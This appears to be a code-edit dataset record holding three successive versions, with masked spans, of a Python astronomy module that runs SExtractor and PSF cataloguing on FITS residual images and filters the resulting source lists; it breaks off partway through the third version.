"index": 8971,
"step-1": "<mask token>\n\n\ndef sextractor(location):\n \"\"\"\n runs SExtractor on all residual images\n \"\"\"\n x = 0\n sources = location + '/sources'\n residuals = location + '/residuals'\n check = os.path.exists(sources)\n check_temp = os.path.exists(sources + '/temp')\n length = len(residuals) + 1\n if check == False:\n os.system('mkdir %s' % sources)\n os.system('mkdir %s/temp' % sources)\n elif check_temp == False:\n os.system('mkdir %s/temp' % sources)\n images = glob.glob(residuals + '/*_residual_.fits')\n initialize.create_configs(location)\n config_loc = location + '/configs/default.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.param' + '\\n')\n data[20\n ] = 'FILTER_NAME' + ' ' + location + '/configs/default.conv' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('-> Converting all residual masks into weight maps...\\n')\n for r in tqdm(images):\n weight = weight_map(r)\n hdu = fits.open(r, mode='update')\n data = hdu[0].data\n hdr = hdu[0].header\n try:\n if hdr['WEIGHT'] == 'N':\n hdr.set('WEIGHT', 'Y')\n hduData = fits.PrimaryHDU(data, header=hdr)\n hduWeight = fits.ImageHDU(weight)\n hduList = fits.HDUList([hduData, hduWeight])\n hduList.writeto(r, overwrite=True)\n except KeyError:\n hdr.set('WEIGHT', 'Y')\n hduData = fits.PrimaryHDU(data, header=hdr)\n hduWeight = fits.ImageHDU(weight)\n hduList = fits.HDUList([hduData, hduWeight])\n hduList.writeto(r, overwrite=True)\n hdu.close()\n try:\n if fits.getval(r, 'NORM') == 'N':\n fits.setval(r, 'NORM', value='Y')\n MR.normalize(r)\n except KeyError:\n fits.setval(r, 'NORM', value='Y')\n MR.normalize(r)\n print('\\n-> SExtracting residual images...')\n for i in images:\n name = i[length:-5]\n data_name = location + '/data/' + name.replace('residual_', ''\n ) + '.fits'\n FWHM = psf.fwhm(data_name)\n im_hdu = fits.open(data_name)\n im_header = im_hdu[0].header\n saturate = im_header['SATURATE']\n pixscale = im_header['PIXSCALE']\n im_hdu.close()\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[51] = 'SATUR_LEVEL' + ' ' + str(saturate) + '\\n'\n data[62] = 'SEEING_FWHM' + ' ' + str(FWHM) + '\\n'\n data[106] = 'PSF_NAME' + ' ' + location + '/psf/' + name[:-9\n ] + '.psf' + '\\n'\n data[58] = 'PIXEL_SCALE' + ' ' + str(pixscale) + '\\n'\n data[32] = 'WEIGHT_IMAGE' + ' ' + '%s[1]' % i + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0]> %s/temp/%s.txt -c %s' % (i, sources,\n name, config_loc))\n temp_hdu_data = fits.PrimaryHDU(fits.getdata(i) * -1, header=fits.\n getheader(i))\n temp_hdu_mask = fits.ImageHDU(fits.getdata(i, 1))\n temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])\n temp_hdu_list.writeto('%s/residuals/temp.fits' % location)\n os.system(\n 'sextractor %s/residuals/temp.fits[0]> %s/temp/%s_2.txt -c %s' %\n (location, sources, name, config_loc))\n append_negative_sources(i)\n os.remove('%s/residuals/temp.fits' % location)\n x += 1\n per = float(x) / float(len(images)) * 100\n print('\\t %.1f%% sextracted...' % per)\n print(\n \"-> SExtracted %d images, catalogues placed in 'sources' directory\\n\" %\n len(images))\n print('-> Filtering source catalogs...\\n')\n src_join(location)\n filter_sources(location)\n\n\ndef sextractor_sim(image):\n location = image.split('/')[:-2]\n location = '/'.join(location)\n sources = location + '/sources'\n check = os.path.exists(sources)\n check_temp = os.path.exists(sources + '/temp')\n if check == False:\n os.system('mkdir %s' % sources)\n os.system('mkdir %s/temp' % sources)\n elif check_temp == False:\n os.system('mkdir %s/temp' % sources)\n initialize.create_configs(location)\n config_loc = location + '/configs/default.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.param' + '\\n')\n data[20\n ] = 'FILTER_NAME' + ' ' + location + '/configs/default.conv' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('\\n-> SExtracting fake image...')\n name = image.split('/')[-1]\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[106] = 'PSF_NAME' + ' ' + location + '/psf/' + name[:-5\n ] + '.psf' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0]> %s/temp/%s.txt -c %s' % (image, sources,\n name, config_loc))\n temp_hdu_data = fits.PrimaryHDU(fits.getdata(image) * -1, header=fits.\n getheader(image))\n temp_hdu_mask = fits.ImageHDU(fits.getdata(image, 1))\n temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])\n temp_hdu_list.writeto('%s/residuals/temp.fits')\n os.system('sextractor %s/residuals/temp.fits[0]> %s/temp/%s.txt -c %s' %\n (location, sources, name, config_loc))\n os.remove('%s/residuals/temp.fits' % location)\n src_join(location)\n filter_sources(location)\n\n\ndef sextractor_psf(location):\n x = 0\n psf_loc = location + '/psf'\n data = location + '/data'\n templates = location + '/templates'\n check = os.path.exists(psf_loc)\n if check == False:\n os.system('mkdir %s' % psf_loc)\n temps = glob.glob(templates + '/*.fits')\n images = glob.glob(data + '/*_A_.fits')\n for t in temps:\n images.append(t)\n cats = glob.glob(location + '/psf/*.cat')\n images_names = [i.split('/')[-1][:-5] for i in images]\n cats_names = [c.split('/')[-1][:-4] for c in cats]\n imageCats = [im for im in images_names if im not in cats_names]\n images = []\n if temps == []:\n temps.append('')\n for imcats in imageCats:\n if imcats == temps[0].split('/')[-1][:-5]:\n images.append(temps[0])\n else:\n images.append(location + '/data/' + imcats + '.fits')\n initialize.create_configs(location)\n config_loc = location + '/configs/psf.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.psfex' + '\\n')\n data[19\n ] = 'FILTER_NAME' + ' ' + location + '/configs/default.conv' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('\\n-> Creating PSF catalogs...')\n if len(temps) == 1:\n for i in images:\n name = i.split('/')[-1][:-5]\n hdu = fits.open(i)\n hdr = hdu[0].header\n pixscale = hdr['PIXSCALE']\n hdu.close()\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[6] = ('CATALOG_NAME' + ' ' + psf_loc + '/' + name +\n '.cat' + '\\n')\n data[44] = 'PIXEL_SCALE' + ' ' + str(pixscale) + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0] -c %s' % (i, config_loc))\n x += 1\n per = float(x) / float(len(images)) * 100\n print('\\t %.1f%% sextracted...' % per)\n print(\n \"-> SExtracted %d images, catalogues placed in 'psf' directory\\n\" %\n len(images))\n else:\n print('\\n-> Error: Problem with number of template images\\n')\n sys.exit()\n return images\n\n\ndef sextractor_psf_sim(location, image):\n psf_loc = location + '/psf'\n data = location + '/data'\n check = os.path.exists(psf_loc)\n length = len(data) + 1\n if check == False:\n os.system('mkdir %s' % psf_loc)\n initialize.create_configs(location)\n config_loc = location + '/configs/psf.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.psfex' + '\\n')\n data[20\n ] = 'FILTER_NAME' + ' ' + location + '/configs/default.conv' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('\\n-> Creating PSF catalog of fake image...')\n name = image[length:-5]\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[6\n ] = 'CATALOG_NAME' + ' ' + psf_loc + '/' + name + '.cat' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0] -c %s' % (image, config_loc))\n\n\ndef weight_map(image):\n hdu = fits.open(image)\n hduMask = hdu[1].data\n zeroMask = np.zeros(hduMask.shape)\n weightMap = np.logical_not(np.logical_or(hduMask, zeroMask)).astype(float)\n hdu.close()\n return weightMap\n\n\ndef src_join(location):\n source_loc = location + '/sources'\n temp_source_loc = source_loc + '/temp'\n temp_source_files = glob.glob(temp_source_loc + '/*.txt')\n image_names = filters.get_image_names(location)\n for file in temp_source_files:\n with open(file, 'r') as fl:\n data = fl.readlines()\n data = [str(file.replace('txt', 'fits')[len(source_loc) + 6:]) + '\\n'\n ] + data\n data.append('\\n\\n\\n')\n with open(source_loc + '/sources.txt', 'a+') as s:\n if data[0] not in image_names:\n s.writelines(data)\n os.remove(file)\n try:\n os.rmdir(temp_source_loc)\n except:\n print(\"-> Error: Problem removing temp directory in '/sources'\")\n\n\ndef filter_sources(location, mask_sources=False):\n print('\\n-> Filtering out non PSF-like sources...')\n filters.spread_model_filter(location)\n print('-> Filtering out diveted detections...')\n images = glob.glob(location + '/data/*_A_.fits')\n for i in images:\n indices = filters.divot(i)\n filters.update_filtered_sources(location, indices)\n residuals = glob.glob('%s/residuals/*_residual_.fits' % location)\n if mask_sources == True:\n for r in residuals:\n filters.mask_sources_image(r)\n\n\n<mask token>\n\n\ndef append_negative_sources(residual, MR=False):\n location = residual.split('/')[:-2]\n location = '/'.join(location)\n name = residual.split('/')[-1]\n name = name.replace('.fits', '')\n if MR == True:\n with open('%s/sources/%s_sources_2.txt' % (location, name), 'r'\n ) as neg_sources:\n lines = neg_sources.readlines()\n with open('%s/sources/%s_sources.txt' % (location, name), 'a'\n ) as sources:\n for l in lines:\n if l[0] != '#':\n sources.write(l)\n os.remove('%s/sources/%s_sources_2.txt' % (location, name))\n else:\n with open('%s/sources/temp/%s_2.txt' % (location, name), 'r'\n ) as neg_sources:\n lines = neg_sources.readlines()\n with open('%s/sources/temp/%s.txt' % (location, name), 'a') as sources:\n for l in lines:\n if l[0] != '#':\n sources.write(l)\n os.remove('%s/sources/temp/%s_2.txt' % (location, name))\n",
"step-2": "<mask token>\n\n\ndef sextractor_MR(location, MR_method='swarp', use_config_file=True):\n \"\"\"\n runs SExtractor on master residual\n \"\"\"\n check_MR = glob.glob('%s/residuals/MR.fits' % location)\n if check_MR == []:\n print('-> Master residual does not exist, creating it first...')\n if use_config_file == True:\n MR_method = initialize.get_config_value('MR_method')\n MR.MR(location, MR_method)\n master_res = glob.glob('%s/residuals/MR.fits' % location)\n temp = glob.glob('%s/templates/*.fits' % location)\n if len(master_res) == 1:\n if len(temp) == 1:\n MR = master_res[0]\n template = temp[0]\n temp_name = template.split('/')[-1]\n temp_name = temp_name[:-5]\n MR_hdu = fits.open(MR)\n MR_header = MR_hdu[0].header\n saturate = MR_header['SATURATE']\n temp_hdr = fits.getheader(template)\n pixscale = temp_hdr['PIXSCALE']\n MR_hdu.close()\n FWHM = psf.fwhm_template(template)\n config_loc = location + '/configs/default.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.param' + '\\n')\n data[20] = ('FILTER_NAME' + ' ' + location +\n '/configs/default.conv' + '\\n')\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('\\n-> SExtracting master residual...')\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[51] = 'SATUR_LEVEL' + ' ' + str(saturate) + '\\n'\n data[62] = 'SEEING_FWHM' + ' ' + str(FWHM) + '\\n'\n data[106] = ('PSF_NAME' + ' ' + location + '/psf/' +\n temp_name + '.psf' + '\\n')\n data[58] = 'PIXEL_SCALE' + ' ' + str(pixscale) + '\\n'\n data[32] = 'WEIGHT_IMAGE' + ' ' + '%s[1]' % MR + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0]> %s/sources/MR_sources.txt -c %s' %\n (MR, location, config_loc))\n temp_hdu_data = fits.PrimaryHDU(fits.getdata(MR) * -1, header=\n fits.getheader(MR))\n temp_hdu_mask = fits.ImageHDU(fits.getdata(MR, 1))\n temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])\n temp_hdu_list.writeto('%s/residuals/MR_neg.fits' % location)\n os.system(\n 'sextractor %s/residuals/MR_neg.fits[0]> %s/sources/MR_sources_2.txt -c %s'\n % (location, location, config_loc))\n append_negative_sources(MR, MR=True)\n MR_filter_sources(location)\n else:\n print(\n \"\"\"-> Error: Problem with number of template images\n-> Could not finish SExtracting master residual\"\"\"\n )\n else:\n print(\n \"\"\"-> Error: Problem with number of master residuals\n-> Could not finish SExtracting master residual\"\"\"\n )\n\n\ndef sextractor(location):\n \"\"\"\n runs SExtractor on all residual images\n \"\"\"\n x = 0\n sources = location + '/sources'\n residuals = location + '/residuals'\n check = os.path.exists(sources)\n check_temp = os.path.exists(sources + '/temp')\n length = len(residuals) + 1\n if check == False:\n os.system('mkdir %s' % sources)\n os.system('mkdir %s/temp' % sources)\n elif check_temp == False:\n os.system('mkdir %s/temp' % sources)\n images = glob.glob(residuals + '/*_residual_.fits')\n initialize.create_configs(location)\n config_loc = location + '/configs/default.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.param' + '\\n')\n data[20\n ] = 'FILTER_NAME' + ' ' + location + '/configs/default.conv' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('-> Converting all residual masks into weight maps...\\n')\n for r in tqdm(images):\n weight = weight_map(r)\n hdu = fits.open(r, mode='update')\n data = hdu[0].data\n hdr = hdu[0].header\n try:\n if hdr['WEIGHT'] == 'N':\n hdr.set('WEIGHT', 'Y')\n hduData = fits.PrimaryHDU(data, header=hdr)\n hduWeight = fits.ImageHDU(weight)\n hduList = fits.HDUList([hduData, hduWeight])\n hduList.writeto(r, overwrite=True)\n except KeyError:\n hdr.set('WEIGHT', 'Y')\n hduData = fits.PrimaryHDU(data, header=hdr)\n hduWeight = fits.ImageHDU(weight)\n hduList = fits.HDUList([hduData, hduWeight])\n hduList.writeto(r, overwrite=True)\n hdu.close()\n try:\n if fits.getval(r, 'NORM') == 'N':\n fits.setval(r, 'NORM', value='Y')\n MR.normalize(r)\n except KeyError:\n fits.setval(r, 'NORM', value='Y')\n MR.normalize(r)\n print('\\n-> SExtracting residual images...')\n for i in images:\n name = i[length:-5]\n data_name = location + '/data/' + name.replace('residual_', ''\n ) + '.fits'\n FWHM = psf.fwhm(data_name)\n im_hdu = fits.open(data_name)\n im_header = im_hdu[0].header\n saturate = im_header['SATURATE']\n pixscale = im_header['PIXSCALE']\n im_hdu.close()\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[51] = 'SATUR_LEVEL' + ' ' + str(saturate) + '\\n'\n data[62] = 'SEEING_FWHM' + ' ' + str(FWHM) + '\\n'\n data[106] = 'PSF_NAME' + ' ' + location + '/psf/' + name[:-9\n ] + '.psf' + '\\n'\n data[58] = 'PIXEL_SCALE' + ' ' + str(pixscale) + '\\n'\n data[32] = 'WEIGHT_IMAGE' + ' ' + '%s[1]' % i + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0]> %s/temp/%s.txt -c %s' % (i, sources,\n name, config_loc))\n temp_hdu_data = fits.PrimaryHDU(fits.getdata(i) * -1, header=fits.\n getheader(i))\n temp_hdu_mask = fits.ImageHDU(fits.getdata(i, 1))\n temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])\n temp_hdu_list.writeto('%s/residuals/temp.fits' % location)\n os.system(\n 'sextractor %s/residuals/temp.fits[0]> %s/temp/%s_2.txt -c %s' %\n (location, sources, name, config_loc))\n append_negative_sources(i)\n os.remove('%s/residuals/temp.fits' % location)\n x += 1\n per = float(x) / float(len(images)) * 100\n print('\\t %.1f%% sextracted...' % per)\n print(\n \"-> SExtracted %d images, catalogues placed in 'sources' directory\\n\" %\n len(images))\n print('-> Filtering source catalogs...\\n')\n src_join(location)\n filter_sources(location)\n\n\ndef sextractor_sim(image):\n location = image.split('/')[:-2]\n location = '/'.join(location)\n sources = location + '/sources'\n check = os.path.exists(sources)\n check_temp = os.path.exists(sources + '/temp')\n if check == False:\n os.system('mkdir %s' % sources)\n os.system('mkdir %s/temp' % sources)\n elif check_temp == False:\n os.system('mkdir %s/temp' % sources)\n initialize.create_configs(location)\n config_loc = location + '/configs/default.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.param' + '\\n')\n data[20\n ] = 'FILTER_NAME' + ' ' + location + '/configs/default.conv' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('\\n-> SExtracting fake image...')\n name = image.split('/')[-1]\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[106] = 'PSF_NAME' + ' ' + location + '/psf/' + name[:-5\n ] + '.psf' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0]> %s/temp/%s.txt -c %s' % (image, sources,\n name, config_loc))\n temp_hdu_data = fits.PrimaryHDU(fits.getdata(image) * -1, header=fits.\n getheader(image))\n temp_hdu_mask = fits.ImageHDU(fits.getdata(image, 1))\n temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])\n temp_hdu_list.writeto('%s/residuals/temp.fits')\n os.system('sextractor %s/residuals/temp.fits[0]> %s/temp/%s.txt -c %s' %\n (location, sources, name, config_loc))\n os.remove('%s/residuals/temp.fits' % location)\n src_join(location)\n filter_sources(location)\n\n\ndef sextractor_psf(location):\n x = 0\n psf_loc = location + '/psf'\n data = location + '/data'\n templates = location + '/templates'\n check = os.path.exists(psf_loc)\n if check == False:\n os.system('mkdir %s' % psf_loc)\n temps = glob.glob(templates + '/*.fits')\n images = glob.glob(data + '/*_A_.fits')\n for t in temps:\n images.append(t)\n cats = glob.glob(location + '/psf/*.cat')\n images_names = [i.split('/')[-1][:-5] for i in images]\n cats_names = [c.split('/')[-1][:-4] for c in cats]\n imageCats = [im for im in images_names if im not in cats_names]\n images = []\n if temps == []:\n temps.append('')\n for imcats in imageCats:\n if imcats == temps[0].split('/')[-1][:-5]:\n images.append(temps[0])\n else:\n images.append(location + '/data/' + imcats + '.fits')\n initialize.create_configs(location)\n config_loc = location + '/configs/psf.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.psfex' + '\\n')\n data[19\n ] = 'FILTER_NAME' + ' ' + location + '/configs/default.conv' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('\\n-> Creating PSF catalogs...')\n if len(temps) == 1:\n for i in images:\n name = i.split('/')[-1][:-5]\n hdu = fits.open(i)\n hdr = hdu[0].header\n pixscale = hdr['PIXSCALE']\n hdu.close()\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[6] = ('CATALOG_NAME' + ' ' + psf_loc + '/' + name +\n '.cat' + '\\n')\n data[44] = 'PIXEL_SCALE' + ' ' + str(pixscale) + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0] -c %s' % (i, config_loc))\n x += 1\n per = float(x) / float(len(images)) * 100\n print('\\t %.1f%% sextracted...' % per)\n print(\n \"-> SExtracted %d images, catalogues placed in 'psf' directory\\n\" %\n len(images))\n else:\n print('\\n-> Error: Problem with number of template images\\n')\n sys.exit()\n return images\n\n\ndef sextractor_psf_sim(location, image):\n psf_loc = location + '/psf'\n data = location + '/data'\n check = os.path.exists(psf_loc)\n length = len(data) + 1\n if check == False:\n os.system('mkdir %s' % psf_loc)\n initialize.create_configs(location)\n config_loc = location + '/configs/psf.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.psfex' + '\\n')\n data[20\n ] = 'FILTER_NAME' + ' ' + location + '/configs/default.conv' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('\\n-> Creating PSF catalog of fake image...')\n name = image[length:-5]\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[6\n ] = 'CATALOG_NAME' + ' ' + psf_loc + '/' + name + '.cat' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0] -c %s' % (image, config_loc))\n\n\ndef weight_map(image):\n hdu = fits.open(image)\n hduMask = hdu[1].data\n zeroMask = np.zeros(hduMask.shape)\n weightMap = np.logical_not(np.logical_or(hduMask, zeroMask)).astype(float)\n hdu.close()\n return weightMap\n\n\ndef src_join(location):\n source_loc = location + '/sources'\n temp_source_loc = source_loc + '/temp'\n temp_source_files = glob.glob(temp_source_loc + '/*.txt')\n image_names = filters.get_image_names(location)\n for file in temp_source_files:\n with open(file, 'r') as fl:\n data = fl.readlines()\n data = [str(file.replace('txt', 'fits')[len(source_loc) + 6:]) + '\\n'\n ] + data\n data.append('\\n\\n\\n')\n with open(source_loc + '/sources.txt', 'a+') as s:\n if data[0] not in image_names:\n s.writelines(data)\n os.remove(file)\n try:\n os.rmdir(temp_source_loc)\n except:\n print(\"-> Error: Problem removing temp directory in '/sources'\")\n\n\ndef filter_sources(location, mask_sources=False):\n print('\\n-> Filtering out non PSF-like sources...')\n filters.spread_model_filter(location)\n print('-> Filtering out diveted detections...')\n images = glob.glob(location + '/data/*_A_.fits')\n for i in images:\n indices = filters.divot(i)\n filters.update_filtered_sources(location, indices)\n residuals = glob.glob('%s/residuals/*_residual_.fits' % location)\n if mask_sources == True:\n for r in residuals:\n filters.mask_sources_image(r)\n\n\n<mask token>\n\n\ndef append_negative_sources(residual, MR=False):\n location = residual.split('/')[:-2]\n location = '/'.join(location)\n name = residual.split('/')[-1]\n name = name.replace('.fits', '')\n if MR == True:\n with open('%s/sources/%s_sources_2.txt' % (location, name), 'r'\n ) as neg_sources:\n lines = neg_sources.readlines()\n with open('%s/sources/%s_sources.txt' % (location, name), 'a'\n ) as sources:\n for l in lines:\n if l[0] != '#':\n sources.write(l)\n os.remove('%s/sources/%s_sources_2.txt' % (location, name))\n else:\n with open('%s/sources/temp/%s_2.txt' % (location, name), 'r'\n ) as neg_sources:\n lines = neg_sources.readlines()\n with open('%s/sources/temp/%s.txt' % (location, name), 'a') as sources:\n for l in lines:\n if l[0] != '#':\n sources.write(l)\n os.remove('%s/sources/temp/%s_2.txt' % (location, name))\n",
"step-3": "<mask token>\n\n\ndef sextractor_MR(location, MR_method='swarp', use_config_file=True):\n \"\"\"\n runs SExtractor on master residual\n \"\"\"\n check_MR = glob.glob('%s/residuals/MR.fits' % location)\n if check_MR == []:\n print('-> Master residual does not exist, creating it first...')\n if use_config_file == True:\n MR_method = initialize.get_config_value('MR_method')\n MR.MR(location, MR_method)\n master_res = glob.glob('%s/residuals/MR.fits' % location)\n temp = glob.glob('%s/templates/*.fits' % location)\n if len(master_res) == 1:\n if len(temp) == 1:\n MR = master_res[0]\n template = temp[0]\n temp_name = template.split('/')[-1]\n temp_name = temp_name[:-5]\n MR_hdu = fits.open(MR)\n MR_header = MR_hdu[0].header\n saturate = MR_header['SATURATE']\n temp_hdr = fits.getheader(template)\n pixscale = temp_hdr['PIXSCALE']\n MR_hdu.close()\n FWHM = psf.fwhm_template(template)\n config_loc = location + '/configs/default.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.param' + '\\n')\n data[20] = ('FILTER_NAME' + ' ' + location +\n '/configs/default.conv' + '\\n')\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('\\n-> SExtracting master residual...')\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[51] = 'SATUR_LEVEL' + ' ' + str(saturate) + '\\n'\n data[62] = 'SEEING_FWHM' + ' ' + str(FWHM) + '\\n'\n data[106] = ('PSF_NAME' + ' ' + location + '/psf/' +\n temp_name + '.psf' + '\\n')\n data[58] = 'PIXEL_SCALE' + ' ' + str(pixscale) + '\\n'\n data[32] = 'WEIGHT_IMAGE' + ' ' + '%s[1]' % MR + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0]> %s/sources/MR_sources.txt -c %s' %\n (MR, location, config_loc))\n temp_hdu_data = fits.PrimaryHDU(fits.getdata(MR) * -1, header=\n fits.getheader(MR))\n temp_hdu_mask = fits.ImageHDU(fits.getdata(MR, 1))\n temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])\n temp_hdu_list.writeto('%s/residuals/MR_neg.fits' % location)\n os.system(\n 'sextractor %s/residuals/MR_neg.fits[0]> %s/sources/MR_sources_2.txt -c %s'\n % (location, location, config_loc))\n append_negative_sources(MR, MR=True)\n MR_filter_sources(location)\n else:\n print(\n \"\"\"-> Error: Problem with number of template images\n-> Could not finish SExtracting master residual\"\"\"\n )\n else:\n print(\n \"\"\"-> Error: Problem with number of master residuals\n-> Could not finish SExtracting master residual\"\"\"\n )\n\n\ndef sextractor(location):\n \"\"\"\n runs SExtractor on all residual images\n \"\"\"\n x = 0\n sources = location + '/sources'\n residuals = location + '/residuals'\n check = os.path.exists(sources)\n check_temp = os.path.exists(sources + '/temp')\n length = len(residuals) + 1\n if check == False:\n os.system('mkdir %s' % sources)\n os.system('mkdir %s/temp' % sources)\n elif check_temp == False:\n os.system('mkdir %s/temp' % sources)\n images = glob.glob(residuals + '/*_residual_.fits')\n initialize.create_configs(location)\n config_loc = location + '/configs/default.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.param' + '\\n')\n data[20\n ] = 'FILTER_NAME' + ' ' + location + '/configs/default.conv' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('-> Converting all residual masks into weight maps...\\n')\n for r in tqdm(images):\n weight = weight_map(r)\n hdu = fits.open(r, mode='update')\n data = hdu[0].data\n hdr = hdu[0].header\n try:\n if hdr['WEIGHT'] == 'N':\n hdr.set('WEIGHT', 'Y')\n hduData = fits.PrimaryHDU(data, header=hdr)\n hduWeight = fits.ImageHDU(weight)\n hduList = fits.HDUList([hduData, hduWeight])\n hduList.writeto(r, overwrite=True)\n except KeyError:\n hdr.set('WEIGHT', 'Y')\n hduData = fits.PrimaryHDU(data, header=hdr)\n hduWeight = fits.ImageHDU(weight)\n hduList = fits.HDUList([hduData, hduWeight])\n hduList.writeto(r, overwrite=True)\n hdu.close()\n try:\n if fits.getval(r, 'NORM') == 'N':\n fits.setval(r, 'NORM', value='Y')\n MR.normalize(r)\n except KeyError:\n fits.setval(r, 'NORM', value='Y')\n MR.normalize(r)\n print('\\n-> SExtracting residual images...')\n for i in images:\n name = i[length:-5]\n data_name = location + '/data/' + name.replace('residual_', ''\n ) + '.fits'\n FWHM = psf.fwhm(data_name)\n im_hdu = fits.open(data_name)\n im_header = im_hdu[0].header\n saturate = im_header['SATURATE']\n pixscale = im_header['PIXSCALE']\n im_hdu.close()\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[51] = 'SATUR_LEVEL' + ' ' + str(saturate) + '\\n'\n data[62] = 'SEEING_FWHM' + ' ' + str(FWHM) + '\\n'\n data[106] = 'PSF_NAME' + ' ' + location + '/psf/' + name[:-9\n ] + '.psf' + '\\n'\n data[58] = 'PIXEL_SCALE' + ' ' + str(pixscale) + '\\n'\n data[32] = 'WEIGHT_IMAGE' + ' ' + '%s[1]' % i + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0]> %s/temp/%s.txt -c %s' % (i, sources,\n name, config_loc))\n temp_hdu_data = fits.PrimaryHDU(fits.getdata(i) * -1, header=fits.\n getheader(i))\n temp_hdu_mask = fits.ImageHDU(fits.getdata(i, 1))\n temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])\n temp_hdu_list.writeto('%s/residuals/temp.fits' % location)\n os.system(\n 'sextractor %s/residuals/temp.fits[0]> %s/temp/%s_2.txt -c %s' %\n (location, sources, name, config_loc))\n append_negative_sources(i)\n os.remove('%s/residuals/temp.fits' % location)\n x += 1\n per = float(x) / float(len(images)) * 100\n print('\\t %.1f%% sextracted...' % per)\n print(\n \"-> SExtracted %d images, catalogues placed in 'sources' directory\\n\" %\n len(images))\n print('-> Filtering source catalogs...\\n')\n src_join(location)\n filter_sources(location)\n\n\ndef sextractor_sim(image):\n location = image.split('/')[:-2]\n location = '/'.join(location)\n sources = location + '/sources'\n check = os.path.exists(sources)\n check_temp = os.path.exists(sources + '/temp')\n if check == False:\n os.system('mkdir %s' % sources)\n os.system('mkdir %s/temp' % sources)\n elif check_temp == False:\n os.system('mkdir %s/temp' % sources)\n initialize.create_configs(location)\n config_loc = location + '/configs/default.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.param' + '\\n')\n data[20\n ] = 'FILTER_NAME' + ' ' + location + '/configs/default.conv' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('\\n-> SExtracting fake image...')\n name = image.split('/')[-1]\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[106] = 'PSF_NAME' + ' ' + location + '/psf/' + name[:-5\n ] + '.psf' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n 